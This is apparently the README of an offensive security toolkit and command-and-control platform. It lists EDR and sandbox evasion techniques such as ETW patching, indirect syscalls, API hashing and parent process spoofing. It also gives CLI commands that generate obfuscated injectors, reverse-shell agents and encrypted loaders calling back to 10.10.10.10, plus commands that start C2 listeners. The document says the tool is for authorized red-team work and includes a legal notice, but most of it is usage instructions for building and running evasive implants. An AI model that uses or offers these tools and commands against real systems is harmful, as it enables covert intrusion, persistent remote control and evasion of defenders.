Multi-Language Offensive Security Toolkit & C2 Platform
A professional-grade framework for generating, obfuscating, and managing offensive security payloads. Designed for Red Team operations, it emphasizes OpSec, evasion, and modern C2 tradecraft.
- Indirect Syscalls (Hell's Gate): Bypasses user-mode EDR hooks by resolving SSNs dynamically and executing syscalls via inline assembly.
- BlockDLLs Policy: Prevents non-Microsoft DLLs from injecting into the payload process (
0x100000000000). - ETW Patching: Blinds Event Tracing for Windows by patching
EtwEventWriteinntdll.dll. - Parent Process Spoofing: Spawns payloads under
explorer.exeto blend into the process tree. - API Hashing: Uses ROR13 hashing to hide imports. No static strings for sensitive APIs in IAT.
- Stack Strings: Constructs sensitive strings (IPs, DLL names) on the stack at runtime to defeat
stringsanalysis. - Smart Sandbox Evasion:
- Checks for realistic hardware (RAM > 4GB, CPU Cores >= 2).
- Detects virtualization artifacts (VMware/VirtualBox MAC vendors).
- Control Flow Flattening (CFF): Obfuscates C logic using state machines and opaque predicates.
- Transport Protocols:
- TCP: Standard raw sockets.
- HTTP: Malleable HTTP Polling (looks like web browsing).
- DNS (DoH): (Experimental) Encapsulated command traffic over DNS queries.
- Session Management: Full session logging (
logs/sessions/) and interaction. - Audit Logging: Tracks every operator command in
logs/audit.jsonfor accountability.
- Languages: C (WinAPI/Syscalls), Go, Rust, PowerShell, Bash, Python, JavaScript.
- Types:
- Process Injection (Early Bird APC)
- Reverse Shells (HTTP, TCP, SSL)
- Loaders / Stubs (AES-256 Encrypted)
- Safety Guardrails:
- Kill Date: Payload self-destructs after a specific date (
--kill-date YYYY-MM-DD). - Geofencing: Execution blocked if public IP is not in allowed country (
--geofence US).
- Kill Date: Payload self-destructs after a specific date (
- Clone the repository.
- Install Python dependencies:
pip install -r requirements.txt
- Ensure you have compilers installed (
gcc,mingw-w64,go,rustc).
Use the included Docker environment for reproducible builds without polluting your host.
docker-compose run --rm payload-gen --helpRun the CLI using src/main.py.
Stealth Windows Injector (C) Generates a payload using Indirect Syscalls, ETW Patching, and BlockDLLs.
python3 src/main.py gen --type inject --os windows --ip 10.10.10.10 --port 443 --obfuscate high --out payload.exeHTTP Polling Agent (Go) Generates a Go agent that polls the C2 server over HTTP.
python3 src/main.py gen --type reverse-shell --os windows --lang go --ip 10.10.10.10 --port 80 --out agent.exeOpSec Safe Payload with Guardrails Ensures payload only runs in the US and before 2025.
python3 src/main.py gen --type stub --os windows --ip 10.10.10.10 --port 443 --encrypt \
--kill-date 2025-01-01 --geofence US --anti-analysis --out loader.exeStart HTTP Listener Starts a C2 server listening for HTTP polling agents on port 80.
python3 src/main.py listen --protocol http --port 80Start TCP Listener Starts a standard raw TCP listener.
python3 src/main.py listen --protocol tcp --port 4444Once a session connects:
list: Show active sessions.interact <ID>: Enter session interaction mode.background: Return to main menu.kill <ID>: Terminate a session.
ETHICAL WARNING & LEGAL NOTICE
This tool is developed for educational purposes and authorized Red Team operations only.
- DO NOT use this tool on systems you do not have explicit, written permission to test.
- The authors are not responsible for any damage or legal consequences resulting from the misuse of this software.
- Malicious use of this software is illegal and punishable by law.
This project is licensed under the MIT License - see the LICENSE file for details.